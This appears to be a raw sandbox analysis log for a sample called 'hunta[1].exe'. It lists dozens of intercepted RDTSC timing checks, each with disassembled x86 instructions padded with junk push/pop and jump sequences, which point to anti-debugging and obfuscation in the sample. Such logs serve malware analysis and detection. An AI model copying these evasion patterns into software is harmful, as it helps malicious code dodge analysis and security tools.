Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59309B8 second address: 59309E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, 34h 0x00000005 movsx edi, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov ecx, 3DFD71AFh 0x00000012 pushad 0x00000013 call 00007FF2E55A2C32h 0x00000018 pop eax 0x00000019 mov eax, edi 0x0000001b popad 0x0000001c popad 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59309E9 second address: 59309ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59309ED second address: 59309F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59309F1 second address: 59309F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59309F7 second address: 59309FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59309FD second address: 5930A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5930A01 second address: 5930A18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5930A18 second address: 5930A35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5980379 second address: 598037F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 598037F second address: 5980383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5980383 second address: 59803B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF2E55A2C34h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59803B3 second address: 59803B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59803B9 second address: 59803BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5960E03 second address: 5960E09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5960E09 second address: 5960E0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 58F054D second address: 58F0553 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 58F0553 second address: 58F0557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 58F0557 second address: 58F0583 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FF2E5514DEEh 0x00000012 pop ebp 0x00000013 pushad 0x00000014 push esi 0x00000015 mov dl, 1Ch 0x00000017 pop esi 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 596063D second address: 5960662 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF2E55A2C2Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5960662 second address: 5960668 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5960668 second address: 596066C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 596066C second address: 59606ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF2E5514DEFh 0x00000013 jmp 00007FF2E5514DF3h 0x00000018 popfd 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FF2E5514DF6h 0x00000020 xor esi, 3A0D51E8h 0x00000026 jmp 00007FF2E5514DEBh 0x0000002b popfd 0x0000002c mov ecx, 076D95DFh 0x00000031 popad 0x00000032 popad 0x00000033 xchg eax, ebp 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FF2E5514DECh 0x0000003d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59606ED second address: 59606F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59606F1 second address: 59606F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59606F7 second address: 596070C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, dx 0x00000006 mov di, F68Ch 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 596070C second address: 5960728 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5960728 second address: 596073A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E55A2C2Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5960C5C second address: 5960C79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5960C79 second address: 5960C98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ax, 6CE9h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5960C98 second address: 5960C9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5960C9D second address: 5960CCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF2E55A2C2Eh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov esi, edx 0x00000016 push edx 0x00000017 pop ecx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5960CCF second address: 5960CD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5960CD4 second address: 5960D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FF2E55A2C2Eh 0x0000000a xor si, 8348h 0x0000000f jmp 00007FF2E55A2C2Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov eax, dword ptr [ebp+08h] 0x0000001b pushad 0x0000001c movzx esi, bx 0x0000001f mov edi, 5CC8DA24h 0x00000024 popad 0x00000025 and dword ptr [eax], 00000000h 0x00000028 jmp 00007FF2E55A2C33h 0x0000002d and dword ptr [eax+04h], 00000000h 0x00000031 pushad 0x00000032 pushad 0x00000033 push eax 0x00000034 pop edi 0x00000035 pushad 0x00000036 popad 0x00000037 popad 0x00000038 pushfd 0x00000039 jmp 00007FF2E55A2C2Ch 0x0000003e xor al, 00000008h 0x00000041 jmp 00007FF2E55A2C2Bh 0x00000046 popfd 0x00000047 popad 0x00000048 pop ebp 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FF2E55A2C35h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5930929 second address: 593092D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 593092D second address: 5930933 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5960F85 second address: 5960F94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59107F3 second address: 5910877 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 pushfd 0x00000006 jmp 00007FF2E55A2C2Bh 0x0000000b sbb al, 0000004Eh 0x0000000e jmp 00007FF2E55A2C39h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 push eax 0x0000001a push ebx 0x0000001b pop eax 0x0000001c pop edi 0x0000001d popad 0x0000001e push eax 0x0000001f pushad 0x00000020 mov cx, dx 0x00000023 pushfd 0x00000024 jmp 00007FF2E55A2C33h 0x00000029 jmp 00007FF2E55A2C33h 0x0000002e popfd 0x0000002f popad 0x00000030 xchg eax, ebp 0x00000031 pushad 0x00000032 movzx ecx, dx 0x00000035 popad 0x00000036 mov ebp, esp 0x00000038 jmp 00007FF2E55A2C2Ah 0x0000003d pop ebp 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 mov cx, di 0x00000044 mov dx, F0CCh 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5970E0A second address: 5970E2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, E484h 0x00000007 push edi 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d jmp 00007FF2E5514DEFh 0x00000012 mov ebp, esp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5970E2E second address: 5970E32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5970E32 second address: 5970E38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5970E38 second address: 5970EBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b movzx ecx, di 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007FF2E55A2C34h 0x00000015 xchg eax, ecx 0x00000016 pushad 0x00000017 jmp 00007FF2E55A2C2Eh 0x0000001c movzx esi, dx 0x0000001f popad 0x00000020 mov eax, dword ptr [777265FCh] 0x00000025 jmp 00007FF2E55A2C2Dh 0x0000002a test eax, eax 0x0000002c pushad 0x0000002d pushad 0x0000002e mov dh, ch 0x00000030 mov bl, 77h 0x00000032 popad 0x00000033 push eax 0x00000034 push edx 0x00000035 pop ecx 0x00000036 pop edx 0x00000037 popad 0x00000038 je 00007FF3572D56F7h 0x0000003e pushad 0x0000003f pushad 0x00000040 movzx esi, bx 0x00000043 mov edi, 7D806BD2h 0x00000048 popad 0x00000049 push edi 0x0000004a movzx ecx, di 0x0000004d pop ebx 0x0000004e popad 0x0000004f mov ecx, eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007FF2E55A2C2Dh 0x00000058 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5970EBD second address: 5970F32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 pushfd 0x00000007 jmp 00007FF2E5514DF3h 0x0000000c and eax, 26EE5D2Eh 0x00000012 jmp 00007FF2E5514DF9h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xor eax, dword ptr [ebp+08h] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FF2E5514DF8h 0x00000027 jmp 00007FF2E5514DF5h 0x0000002c popfd 0x0000002d mov bh, cl 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5970F32 second address: 5970F6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c jmp 00007FF2E55A2C30h 0x00000011 ror eax, cl 0x00000013 jmp 00007FF2E55A2C30h 0x00000018 leave 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5970F6C second address: 5970F72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59701E4 second address: 5970237 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FF2E55A2C33h 0x00000015 sbb ecx, 2A981A3Eh 0x0000001b jmp 00007FF2E55A2C39h 0x00000020 popfd 0x00000021 movzx eax, dx 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5970237 second address: 5970275 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, cx 0x00000006 mov eax, 00CC3F9Bh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e and dword ptr [eax], 00000000h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 movsx edx, si 0x00000017 pushfd 0x00000018 jmp 00007FF2E5514DF4h 0x0000001d sbb cx, F998h 0x00000022 jmp 00007FF2E5514DEBh 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5970275 second address: 5970299 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5970299 second address: 597029D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 597029D second address: 59702B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 593001E second address: 5930024 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5930024 second address: 5930056 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, ecx 0x00000005 mov si, F9AFh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d jmp 00007FF2E55A2C32h 0x00000012 push eax 0x00000013 jmp 00007FF2E55A2C2Bh 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5930056 second address: 5930071 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5930071 second address: 5930089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E55A2C34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5930089 second address: 593008D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 593008D second address: 59300D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushad 0x0000000c mov ebx, 18AD75AEh 0x00000011 push ebx 0x00000012 pop ecx 0x00000013 popad 0x00000014 pushfd 0x00000015 jmp 00007FF2E55A2C2Bh 0x0000001a and esi, 23B8A65Eh 0x00000020 jmp 00007FF2E55A2C39h 0x00000025 popfd 0x00000026 popad 0x00000027 and esp, FFFFFFF8h 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59300D7 second address: 59300DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59300DB second address: 59300DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59300DF second address: 59300E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59300E5 second address: 5930129 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF2E55A2C37h 0x00000009 sbb si, E11Eh 0x0000000e jmp 00007FF2E55A2C39h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5930129 second address: 593012D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 593012D second address: 5930131 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5930131 second address: 5930137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5930137 second address: 593013D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 593013D second address: 5930156 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5930156 second address: 593015A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 593015A second address: 5930160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5930160 second address: 5930166 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5930166 second address: 593020B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 jmp 00007FF2E5514DEDh 0x0000000e xchg eax, ebx 0x0000000f pushad 0x00000010 mov ecx, 5CA77E43h 0x00000015 mov dl, ch 0x00000017 popad 0x00000018 push eax 0x00000019 jmp 00007FF2E5514DF2h 0x0000001e xchg eax, ebx 0x0000001f jmp 00007FF2E5514DF0h 0x00000024 mov ebx, dword ptr [ebp+10h] 0x00000027 pushad 0x00000028 jmp 00007FF2E5514DEEh 0x0000002d mov ah, 1Dh 0x0000002f popad 0x00000030 push ebx 0x00000031 jmp 00007FF2E5514DEAh 0x00000036 mov dword ptr [esp], esi 0x00000039 jmp 00007FF2E5514DF0h 0x0000003e mov esi, dword ptr [ebp+08h] 0x00000041 jmp 00007FF2E5514DF0h 0x00000046 xchg eax, edi 0x00000047 jmp 00007FF2E5514DF0h 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 mov eax, 5FF38DC3h 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 593020B second address: 593022D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b mov bx, si 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 593022D second address: 5930289 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF2E5514DF4h 0x00000008 sub ax, 1EE8h 0x0000000d jmp 00007FF2E5514DEBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 test esi, esi 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FF2E5514DF4h 0x0000001f jmp 00007FF2E5514DF5h 0x00000024 popfd 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5930289 second address: 59302DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 je 00007FF357310FACh 0x0000000c pushad 0x0000000d mov dx, ax 0x00000010 pushfd 0x00000011 jmp 00007FF2E55A2C32h 0x00000016 and ch, FFFFFFD8h 0x00000019 jmp 00007FF2E55A2C2Bh 0x0000001e popfd 0x0000001f popad 0x00000020 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FF2E55A2C35h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59302DA second address: 59302DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59302DF second address: 5930368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 je 00007FF357310F6Bh 0x0000000d jmp 00007FF2E55A2C36h 0x00000012 mov edx, dword ptr [esi+44h] 0x00000015 jmp 00007FF2E55A2C30h 0x0000001a or edx, dword ptr [ebp+0Ch] 0x0000001d jmp 00007FF2E55A2C30h 0x00000022 test edx, 61000000h 0x00000028 pushad 0x00000029 mov al, C3h 0x0000002b call 00007FF2E55A2C33h 0x00000030 movzx esi, dx 0x00000033 pop edi 0x00000034 popad 0x00000035 jne 00007FF357310F65h 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FF2E55A2C37h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5930368 second address: 593036F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 593036F second address: 5930381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 test byte ptr [esi+48h], 00000001h 0x0000000b pushad 0x0000000c mov eax, edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
